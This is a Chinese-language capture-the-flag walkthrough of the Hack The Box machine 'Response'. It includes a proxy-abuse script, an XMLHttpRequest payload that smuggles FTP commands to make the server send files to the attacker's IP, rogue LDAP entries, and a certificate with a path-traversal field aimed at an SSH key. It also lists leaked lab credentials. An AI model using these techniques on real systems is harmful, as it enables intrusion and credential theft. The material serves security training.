发布于 

HTB: Response

❗本文由于图床挂了,保存的图片都丢失了😭,希望大家引以为戒做好备份工作。
非常抱歉,由于我的原因给大家带来了阅读体验上的困扰!
❗This article has lost all saved images due to a problem with the image hosting service. 😭 Please take this as a lesson and remember to always back up your data.
I sincerely apologize for any inconvenience caused to your reading experience due to our mistake!

Box Info

Name
Response
Difficulty: Insane
Points: 50
Release: 14 May 2022
IP: 10.10.11.163
OS: Linux
Radar Graph:

实战

信息收集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/HTB]                               
└─$ rustscan -a 10.10.11.163                                
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.           
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |         
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |       
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'               
The Modern Day Port Scanner.                                           
________________________________________                               
: https://discord.gg/GFrQsGy           :                               
: https://github.com/RustScan/RustScan :                               
 --------------------------------------                                
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan               
   
[~] The config file is expected to be at "/home/kali/.rustscan.toml"   
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers                        
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.163:22                                     
Open 10.10.11.163:80 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/HTB]
└─$ nmap -sC -sV -p22,80 10.10.11.163
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 03:54 EST
Nmap scan report for 10.10.11.163
Host is up (0.082s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e9a4394afb065d5782fc4a0e0be46b25 (RSA)
|   256 a323e498dfb6911bf2ac2f1cc1469b15 (ECDSA)
|_  256 fb105fda55a66b953df2e85c0336ff31 (ED25519)
80/tcp open  http    nginx 1.21.6
|_http-title: Did not follow redirect to http://www.response.htb
|_http-server-header: nginx/1.21.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds

目录扫描

80端口显示了一个网页

gobuster跑一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/HTB]
└─$ gobuster dir -u http://www.response.htb -w ~/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt  

===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://www.response.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/15 04:02:42 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 169] [--> http://www.response.htb/css/]
/img                  (Status: 301) [Size: 169] [--> http://www.response.htb/img/]
/assets               (Status: 301) [Size: 169] [--> http://www.response.htb/assets/]
/fonts                (Status: 301) [Size: 169] [--> http://www.response.htb/fonts/]
/status               (Status: 301) [Size: 169] [--> http://www.response.htb/status/]

assets和status里可能有东西,再跑一下

assets 403

这个proxy感觉有门路

经过Base64转换得到结果

{"servers":[{"id":1,"ip":"127.0.0.1","name":"Test Server"}]}

那么拿status/main.js.php中的get_chat_status尝试一下

得到结果 {"status":"running","vhost":"chat.response.htb"}

用户权限

得到了chat.response.htb之后无论是添加hosts记录还是直接访问都无法打开网页,那么尝一下通过之前json格式的设置。

并且用api.response.htb做跳板

{"api_version":"1.0","endpoints":[{"desc":"get api status","method":"GET","route":"/"},{"desc":"get internal chat status","method":"GET","route":"/get_chat_status"},{"desc":"get monitored servers list","method":"GET","route":"/get_servers"}],"status":"running"}

写个python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
import random
import re
import requests
from socketserver import ThreadingMixIn
import sys
import threading
import time


hostName = "0.0.0.0"
serverPort = 80


class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.request_handler('GET')

    def do_POST(self):
        self.request_handler('POST')

    def request_handler(self, method):
        self.random_number = random.randint(100000,999999)

        path = self.path
        myurl = 'http://chat.response.htb' + path
        print(f"[{self.random_number}] {method} {myurl}")
       
        if method == 'POST':
            content_len = int(self.headers.get('Content-Length'))
            post_body = self.rfile.read(content_len)
            print(f"[{self.random_number}] body: {post_body}")
        else:
            post_body = None

        digest = self.get_digest(myurl)

        data = self.send_request_to_proxy(myurl, method, digest, post_body)

        self.send_response(200)
        if path.endswith('.js'):
            self.send_header("Content-type", "application/javascript")
        elif path.endswith('.css'):
            self.send_header("Content-type", "text/css")
        else:
            self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(data)

    def get_digest(self, myurl):
        url = 'http://www.response.htb/status/main.js.php'
        cookies = {'PHPSESSID': myurl}
        response = requests.get(url, cookies=cookies)
        response.raise_for_status()
        assert 'session_digest' in response.text
        session_digest = re.search(r'\'session_digest\':\'([^\']+)', response.text).group(1)
        #print(f"[{self.random_number}] digest: {session_digest}")
        return session_digest

    def send_request_to_proxy(self, myurl, method, digest, body=None):
        url = 'http://proxy.response.htb/fetch'
        data = {'url': myurl,
                'url_digest': digest,
                'method': method,
                'session': '1a5455b829845168770cb337f1a05507',
                'session_digest': 'd27e297b494df599e72985e6e9a166751d7de74136df9d74468aac0818c29125'}
        if method == 'POST':
            data['body'] = base64.b64encode(body)
        response = requests.post(url, json=data)
        response.raise_for_status()
        assert 'body' in response.text and 'status_code' in response.text
        body = response.json()['body']
        status_code = response.json()['status_code']
        print(f"[{self.random_number}] status_code from proxy: {status_code}; length of body: {len(body)}")
        decoded_string = base64.b64decode(body)
        return decoded_string


# This part is for multithreaing.
# See https://stackoverflow.com/questions/14088294/multithreaded-web-server-in-python
# Multithreading is necessary because a lot of requests are made when opening the chat application.
# Some requests take several seconds to complete. I don't want these requests to hold back the other ones.
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """Handle requests in a separate thread."""


def main():
    print("Edit your /etc/hosts like this:")
    print("10.10.11.163    www.response.htb proxy.response.htb     # HTB machine IP")
    print("10.10.16.29     chat.response.htb                       # my VPN IP")
    print("While runing this script, open http://chat.response.htb/ in the web browser\n")

    # Without multithreading:
    #webServer = HTTPServer((hostName, serverPort), MyServer)
    # With multithreading (choose one or the other):
    webServer = ThreadedHTTPServer((hostName, serverPort), MyServer)

    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("Server stopped.")


if __name__ == "__main__":       
    main()

打开网页后发现

下载后查询README.md
配置文件在server中的index.js

发现了用户名和密码是guestguest

仅存的员工聊聊天

这条路没得走了
再看看下载下来的源码
其中有个ldap服务

Idap服务

安装

1
sudo apt install slapd

配置

1
sudo dpkg-reconfigure slapd

选择no

填入response.htb

organization name: response

然后创建一个Idif file

1
2
3
4
5
6
7
8
9
10
11
12
dn: ou=users,dc=response,dc=htb
changetype: add
objectClass: organizationalPerson
sn:test
cn:test

dn: uid=admin,ou=users,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
userPassword: password
sn: test
cn: test

启动服务

1
service slapd start
1
ldapadd -x -D "cn=admin,dc=response,dc=htb" -w 'password' -H ldap://127.0.0.1 -f group.ldif

FTP

聊完天给了我们线索

1
2
3
4
5
6
7
 (yourself)
ok
bob
awesome!
i moved the internal ftp server... the new ip address is 172.18.0.2 and it is listening on port 2121. the creds are ftp_user / Secret12345
outgoing traffic from the server is currently allowed, but i will adjust the firewall to fix that
btw. would be great if you could send me the javascript article you were talking about

172.18.0.2 2121 ftp_user Secret12345

创建一个html,为什么要创建可以看这篇文章👉 https://www.serv-u.com/resources/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command

1
2
3
4
5
6
7
8
9
10
11
12
13
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
    }
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nLIST\r\n");
</script>

本机ip就是10,10,16,29

10,15意味着10*256+15=2575

然后运行

1
python3 -m http.server 9001
1
nc -lvnp 2575

之前bob不是找admin有事么,发个链接给他(上面的html文件命名为1.html)

1
http://我的ip:9001/1.html    
1
2
3
4
5
6
┌──(kali㉿kali)-[~/HTB]
└─$ nc -lvnp 2575
listening on [any] 2575 ...
connect to [10.10.16.29] from (UNKNOWN) [10.10.11.163] 39036
-rw-r--r--    1 root     root            74 Mar 16  2022 creds.txt

给了我认证信息

那我再修改一下上面的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
    }
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nRETR creds.txt\r\n");
</script>

得到结果

1
2
3
4
5
6
7
8
ftp
---
ftp_user / Secret12345

ssh
---
bob / F6uXVwEjdZ46fsbXDmQK7YPY3OM

ssh试试

🎉🎉🎉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/HTB]    
└─$ ssh bob@10.10.11.163   
The authenticity of host '10.10.11.163 (10.10.11.163)' can't be established.                   
ED25519 key fingerprint is SHA256:iPHy1XV7afTauFvMhysv/Ynl8yV39A02ZsTLR42/sd0.                 
This key is not known by any other names.                              
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                       
Warning: Permanently added '10.10.11.163' (ED25519) to the list of known hosts.                
bob@10.10.11.163's password:                                           
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)            
  System load:                      1.69
  Usage of /:                       79.2% of 8.54GB
  Memory usage:                     29%       
  Swap usage:                       0%        
  Processes:                        287       
  Users logged in:                  0           
  IPv4 address for br-01fdb3f286b8: 172.19.0.1                   
  IPv4 address for br-feb0146a542b: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.163
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:76ed

Last login: Sun Jan 15 04:14:32 2023 from 10.10.14.10
bob@response:~$ ls
user.txt
bob@response:~$ cat user.txt
cd**************************954

横向移动

晃了一圈除了用户scryh其他没什么可利用的

进入目录

1
2
3
4
5
6
7
8
9
10
11
12
13
bob@response:/home/scryh$ ls -liah
total 40K
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11  2022 .
524290 drwxr-xr-x 4 root  root  4.0K Mar  4  2022 ..
532271 lrwxrwxrwx 1 root  root     9 Mar  4  2022 .bash_history -> /dev/null
532260 -rw-r--r-- 1 scryh scryh  220 Feb 25  2020 .bash_logout
532259 -rw-r--r-- 1 scryh scryh 3.7K Feb 25  2020 .bashrc
532263 drwx------ 3 scryh scryh 4.0K Mar  4  2022 .cache
565333 drwx------ 3 scryh scryh 4.0K Mar 11  2022 .config
173010 drwx------ 2 scryh scryh 4.0K Mar 16  2022 incident_2022-3-042
532258 -rw-r--r-- 1 scryh scryh  807 Feb 25  2020 .profile
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17  2022 scan
532261 drwx------ 2 scryh scryh 4.0K Mar 10  2022 .ssh

incident没权限访问,进scan看看

1
2
3
4
5
6
7
8
9
bob@response:/home/scryh/scan$ ls -liah
total 28K
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17  2022 .
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11  2022 ..
173020 drwxr-xr-x 4 scryh scryh 4.0K Mar  3  2022 data
173289 drwxr-xr-x 2 scryh scryh 4.0K Jan 15 12:23 output
156892 -rwxr-xr-x 1 scryh scryh 3.4K Mar  4  2022 scan.sh
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15  2022 scripts
156894 -rwxr-xr-x 1 scryh scryh 1.3K Mar 17  2022 send_report.py

在scripts中有三个nmap的脚本

1
2
3
4
5
6
7
bob@response:/home/scryh/scan/scripts$ ls -liah
total 68K
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15  2022 .
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17  2022 ..
173292 -rw-r--r-- 1 scryh scryh 9.5K Mar  3  2022 ssl-cert.nse
173293 -rw-r--r-- 1 scryh scryh  39K Feb 15  2022 ssl-enum-ciphers.nse
173294 -rw-r--r-- 1 scryh scryh 7.6K Feb 15  2022 ssl-heartbleed.nse

那么接下去的重点是nmap的三个脚本,理解一下脚本的作用,说不定可以把172.18.0.3改为我们自己的,这样就可以看出xml和pdf里面有什么了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
local NON_VERBOSE_FIELDS = { "commonName", "organizationName",       
"stateOrProvinceName", "countryName" }                
-- Test to see if the string is UTF-16 and transcode it if possible          
local function maybe_decode(str)                                         
  -- If length is not even, then return as-is                       
  if #str < 2 or #str % 2 == 1 then                              
    return str   
  end          
  if str:byte(1) > 0 and str:byte(2) == 0 then              
    -- little-endian UTF-16                              
    return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, false, nil)
  elseif str:byte(1) == 0 and str:byte(2) > 0 then
    -- big-endian UTF-16
    return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, true, nil)
  else
    return str
  end
end

发现有四个参数,一些名称,在data文件夹里可以看到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
bob@response:/home/scryh/scan/data/countryName$ ls
AD  AN  AW  BF  BN  BW  CG  CO  CY  DZ  ET  GA  GI  GS  HN  IM  JE  KI  KZ  LS  MD  MM  MT  NA  NO  PE  PN  RE  SC  SK  ST  TF  TN  UA  VC  WS
AE  AO  AX  BG  BO  BY  CH  CR  CZ  EC  FI  GB  GL  GT  HR  IN  JM  KM  LA  LT  ME  MN  MU  NC  NP  PF  PR  RO  SD  SL  SV  TG  TO  UG  VE  XK
AF  AQ  AZ  BH  BQ  BZ  CI  CS  DE  EE  FJ  GD  GM  GU  HT  IO  JO  KN  LB  LU  MF  MO  MV  NE  NR  PG  PS  RS  SE  SM  SX  TH  TR  UM  VG  YE
AG  AR  BA  BI  BR  CA  CK  CU  DJ  EG  FK  GE  GN  GW  HU  IQ  JP  KP  LC  LV  MG  MP  MW  NF  NU  PH  PT  RU  SG  SN  SY  TJ  TT  US  VI  YT
AI  AS  BB  BJ  BS  CC  CL  CV  DK  EH  FM  GF  GP  GY  ID  IR  KE  KR  LI  LY  MH  MQ  MX  NG  NZ  PK  PW  RW  SH  SO  SZ  TK  TV  UY  VN  ZA
AL  AT  BD  BL  BT  CD  CM  CW  DM  ER  FO  GG  GQ  HK  IE  IS  KG  KW  LK  MA  MK  MR  MY  NI  OM  PL  PY  SA  SI  SR  TC  TL  TW  UZ  VU  ZM
AM  AU  BE  BM  BV  CF  CN  CX  DO  ES  FR  GH  GR  HM  IL  IT  KH  KY  LR  MC  ML  MS  MZ  NL  PA  PM  QA  SB  SJ  SS  TD  TM  TZ  VA  WF  ZW
bob@response:/home/scryh/scan/data/countryName$ cat CN
China
bob@response:/home/scryh/scan/data/countryName$ cd ../
bob@response:/home/scryh/scan/data$ cd stateOrProvinceName/
bob@response:/home/scryh/scan/data/stateOrProvinceName$ ls
Alabama  Arizona  California  Florida  Hawaii  Indiana  Maryland  Nebraska  Some-State  Texas  Virginia  Wisconsin  Zion
bob@response:/home/scryh/scan/data/stateOrProvinceName$ cat California 
California is a state in the Western United States.
bob@response:/home/scryh/scan/data/stateOrProvinceName$

发现stateOrProvinceName的内容比较长,可以构造../../../../.ssh/id_rsa

再看一下output

1
2
3
4
5
6
7
8
bob@response:/home/scryh/scan/output$ cat log.txt 
scanning server ip 172.18.0.3
- retrieved manager uid: marie
- manager mail address: marie.w@response-test.htb
- failed to retrieve SMTP server for domain "response-test.htb" locally
- retrieved SMTP server for domain "response-test.htb": mail.response-test.htb.
- retrieved ip address of SMTP server: 172.18.0.3
- sending report output/scan_172.18.0.3.pdf to customer marie.w@response-test.htb via SMTP server 172.18.0.3

跑一下pspy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
2023/01/21 08:31:01 CMD: UID=0    PID=34603  | sudo -u scryh bash -c cd /home/scryh/scan;./scan.sh          
2023/01/21 08:31:01 CMD: UID=1000 PID=34605  | /bin/bash ./scan.sh                      
2023/01/21 08:31:01 CMD: UID=1000 PID=34604  | bash -c cd /home/scryh/scan;./scan.sh    
2023/01/21 08:31:01 CMD: UID=1000 PID=34611  | grep ipHostNumber         
2023/01/21 08:31:01 CMD: UID=1000 PID=34610  | /bin/bash ./scan.sh     
2023/01/21 08:31:01 CMD: UID=1000 PID=34609  | /bin/bash ./scan.sh      
2023/01/21 08:31:01 CMD: UID=1000 PID=34612  | cut -d   -f2         
2023/01/21 08:31:01 CMD: UID=1000 PID=34613  | nmap -v -Pn 172.18.0.3 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_172.18.0.3.xml      
2023/01/21 08:31:14 CMD: UID=1000 PID=34614  | wkhtmltopdf output/scan_172.18.0.3.xml output/scan_172.18.0.3.pdf 
2023/01/21 08:34:15 CMD: UID=1000 PID=34852  | /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b  ou=customers,dc=response,dc=htb (uid=marie) 
2023/01/21 08:35:15 CMD: UID=1000 PID=34959  | /usr/bin/env python3 ./send_report.py 172.18.0.3 marie.w@response-test.htb output/scan_172.18.0.3.pdf 
2023/01/21 08:35:15 CMD: UID=0    PID=34960  | /bin/bash /root/ldap/restore_ldap.sh 
2023/01/21 08:35:15 CMD: UID=0    PID=34961  | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/ 
2023/01/21 08:35:15 CMD: UID=0    PID=34962  | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver 
2023/01/21 08:35:15 CMD: UID=0    PID=34968  | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif 
2023/01/21 08:37:15 CMD: UID=1000 PID=35100  | python3 ./send_report.py 172.18.0.3 marie.w@response-test.htb output/scan_172.18.0.3.pdf 
2023/01/21 08:37:15 CMD: UID=0    PID=35101  | /bin/bash /root/ldap/restore_ldap.sh 
2023/01/21 08:37:15 CMD: UID=0    PID=35102  | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/ 
2023/01/21 08:37:15 CMD: UID=0    PID=35103  | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver 
2023/01/21 08:37:15 CMD: UID=0    PID=35109  | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif

拿出命令跑一下,记得补充变量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
bob@response:/home/scryh/scan$ bind_dn='cn=admin,dc=response,dc=htb'
bob@response:/home/scryh/scan$ pwd='aU4EZxEAOnimLNzk3'
bob@response:/home/scryh/scan$ /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'|grep ipHostNumber|cut -d ' ' -f2  #这个命令是scan.sh里的部分命令
172.18.0.3
bob@response:/home/scryh/scan/scripts$  /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'
# extended LDIF
#
# LDAPv3
# base <ou=servers,dc=response,dc=htb> with scope subtree
# filter: (objectclass=ipHost)
# requesting: ALL
#

# TestServer, servers, response.htb
dn: cn=TestServer,ou=servers,dc=response,dc=htb
objectClass: top
objectClass: ipHost
objectClass: device
cn: TestServer
manager: uid=marie,ou=customers,dc=response,dc=htb
ipHostNumber: 172.18.0.3

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

确认了扫描的是172.18.0.3

# TestServer, servers, response.htb这部分就是我们要伪造服务所需要注意的地方了

开始伪造

1
2
3
4
5
6
7
8
9
10
bob@response:~$ vim server.ldif

dn: cn=TestServer2,ou=servers,dc=response,dc=htb                           
changetype: add                 
objectClass: top                    
objectClass: ipHost            
objectClass: device                 
cn: TestServer2               
manager: uid=kali,ou=customers,dc=response,dc=htb                           
ipHostNumber: 10.10.14.78

添加服务

1
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif

又因为pspy扫出来 ipHost常会重置

所以我们要写一个定时脚本

1
2
3
4
5
#!/bin/bash
while [ 1 -eq 1 ]; do
        ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif
        sleep 3
done
1
2
chmod +x test.sh
./test.sh &

发现

1
2023/01/21 10:42:14 CMD: UID=1000 PID=44453  | nmap -v -Pn 10.10.14.78 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_10.10.14.78.xml

已经nmap在扫了

那么再添加发送邮件的信息

查看一下格式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
bob@response:~$ /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b  ou=customers,dc=response,dc=htb '(uid=marie)' 
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree# filter: (uid=marie)
# requesting: ALL
#

# marie, customers, response.htb
dn: uid=marie,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: mariemail: marie.w@response-test.htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

vim adduser.ldif

1
2
3
4
5
6
7
dn: uid=kali,ou=customers,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: kali@response-test.htb
1
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f adduser.ldif

看一下是否写入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
bob@response:~$ ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b  ou=customers,dc=response,dc=htb '(uid=kali)'
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree
# filter: (uid=kali)
# requesting: ALL
#

# kali, customers, response.htb
dn: uid=kali,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: kali@response-test.htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

之后还要搭建自己的https服务

生成证书

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
──(kali㉿kali)-[~/HTB/Response]
└─$ openssl genrsa -out server.key 4096
        
┌──(kali㉿kali)-[~/HTB/Response]
└─$ openssl req -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
State or Province Name (full name) [Some-State]:../../../.ssh/id_rsa
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:10.10.14.78
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
        
──(kali㉿kali)-[~/HTB/Response]                
└─$ openssl x509 -req -in server.csr -out server.crt -signkey server.key -days 3650  
Certificate request self-signature ok    
subject=C = AU, ST = ../../../.ssh/id_rsa, O = Internet Widgits Pty Ltd, CN = 10.10.14.78                    
┌──(kali㉿kali)-[~/HTB/Response]             
└─$ cat server.key >> server.crt                               

#创建https.py

https.py

1
2
3
4
5
6
7
8
import http.server, ssl
server_address = ('10.10.14.78',443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
                               server_side=True,
                               certfile='server.crt',
                               ssl_version=ssl.PROTOCOL_TLS)
httpd.serve_forever()

搭建dns服务

1
2
3
4
5
6
7
8
9
10
sudo docker run -d\
    --name dnsmasq \
    --restart always \
    -p 10.10.14.78:53:53/udp \
    -p 10.10.14.78:8080:8080 \
    -v /root/dnsmasq.conf:/etc/dnsmasq.conf \
    --log-opt "max-size=100m" \
    -e "HTTP_USER=admin" \
    -e "HTTP_PASS=admin" \
    jpillora/dnsmasq

修改dnsmasq.conf

1
2
3
4
5
6
7
8
9
10
log-queries
no-resolv
server=1.0.0.1
server=1.1.1.1
strict-order
server=/company/10.0.0.1
address=/reponse-test.htb/10.10.14.78
address=/mail.response-test.htb/10.10.14.78
localmx
mx-host=response-test.htb,mail.response-test.htb,50

搭建smtp服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
git clone https://github.com/ankraft/smtpproxy.git
cd smtpproxy 
mv smtpproxy.ini.example smtpproxy.ini
# 修改smtpproxy.ini
[config]
port=25
sleeptime=30
waitafterpop=5
debuglevel=0
deleteonerror=true

[logging]
file=smtpproxy.log
size=1000000
count=10
level=INFO

[reports@response.htb]
localhostname=response-test.htb
smtphost=10.10.14.78
smtpsecurity=tls
smtpusername=username
smtppassword=password
popbeforesmtp=true
pophost=pop.example.com
popport=995
popssl=true
popusername=username
poppassword=password
popcheckdelay=60
returnpath=me@example.com

[bar@localdomain.com>]
use=foo@localdomain.com

已经在发pdf了

1
2023/01/21 11:56:12 CMD: UID=1000 PID=53947  | python3 ./send_report.py 172.18.0.3 marie.w@response-test.htb output/scan_172.18.0.3.pdf

python https.py

python2 smtpproxy.py

1
2
3
4
5
6
┌──(root㉿kali)-[~/smtpproxy/msgs]
└─# ls -liah
total 68K
2228303 drwxr-xr-x 2 root root 4.0K Jan 21 07:12 .
2228234 drwxr-xr-x 5 root root 4.0K Jan 21 07:08 ..
2228308 -rw------- 1 root root  60K Jan 21 07:12 tmpbx7ve7.msg
收到了消息(密集恐惧症可不看🙈)
1
JVBERi0xLjQKJcOiw6MKMSAwIG9iago8PAovVGl0bGUgKCkKL0NyZWF0b3IgKP7/AHcAawBoAHQAbQBsAHQAbwBwAGQAZgAgADAALgAxADIALgA1KQovUHJvZHVjZXIgKP7/AFEAdAAgADUALgAxADIALgA4KQovQ3JlYXRpb25EYXRlIChEOjIwMjMwMTIxMTIxMTQ1WikKPj4KZW5kb2JqCjIgMCBvYmoKPDwKL1R5cGUgL0NhdGFsb2cKL1BhZ2VzIDMgMCBSCj4+CmVuZG9iago0IDAgb2JqCjw8Ci9UeXBlIC9FeHRHU3RhdGUKL1NBIHRydWUKL1NNIDAuMDIKL2NhIDEuMAovQ0EgMS4wCi9BSVMgZmFsc2UKL1NNYXNrIC9Ob25lPj4KZW5kb2JqCjUgMCBvYmoKWy9QYXR0ZXJuIC9EZXZpY2VSR0JdCmVuZG9iago2IDAgb2JqCjw8Ci9UeXBlIC9QYWdlCi9QYXJlbnQgMyAwIFIKL0NvbnRlbnRzIDEwIDAgUgovUmVzb3VyY2VzIDEyIDAgUgovQW5ub3RzIDEzIDAgUgovTWVkaWFCb3ggWzAgMCA1OTUuMDAwMDAwIDg0Mi4wMDAwMDBdCj4+CmVuZG9iagoxMiAwIG9iago8PAovQ29sb3JTcGFjZSA8PAovUENTcCA1IDAgUgovQ1NwIC9EZXZpY2VSR0IKL0NTcGcgL0RldmljZUdyYXkKPj4KL0V4dEdTdGF0ZSA8PAovR1NhIDQgMCBSCj4+Ci9QYXR0ZXJuIDw8Cj4+Ci9Gb250IDw8Ci9GNyA3IDAgUgovRjggOCAwIFIKL0Y5IDkgMCBSCj4+Ci9YT2JqZWN0IDw8Cj4+Cj4+CmVuZG9iagoxMyAwIG9iagpbIF0KZW5kb2JqCjEwIDAgb2JqCjw8Ci9MZW5ndGggMTEgMCBSCi9GaWx0ZXIgL0ZsYXRlRGVjb2RlCj4+CnN0cmVhbQp4nO2dW4/j1pVG3+tX6DmAZfEiXoDBAN1t9wABEsCwgXkI8jCwxxMYdjCePOTvj6pEsaWS1sfSajbpjssBYr